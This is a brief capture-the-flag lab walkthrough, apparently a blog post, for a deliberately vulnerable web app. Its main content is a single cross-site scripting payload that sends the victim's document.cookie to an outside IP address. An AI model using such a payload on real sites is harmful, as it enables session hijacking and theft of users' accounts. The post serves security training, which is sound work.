Post

IML - Mini CTF: Vulnerable Web App – Ep.3

Mini CTF Vulnerable Web App – - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



IML - Mini CTF: Vulnerable Web App – Ep.3

image1

  • Get an input field that broadcasts:

image2

  • Use payload:

<img src=x onerror="location.href='http://10.102.120.158:8001/?c='+ document.cookie">

image3

This post is licensed under CC BY 4.0 by the author.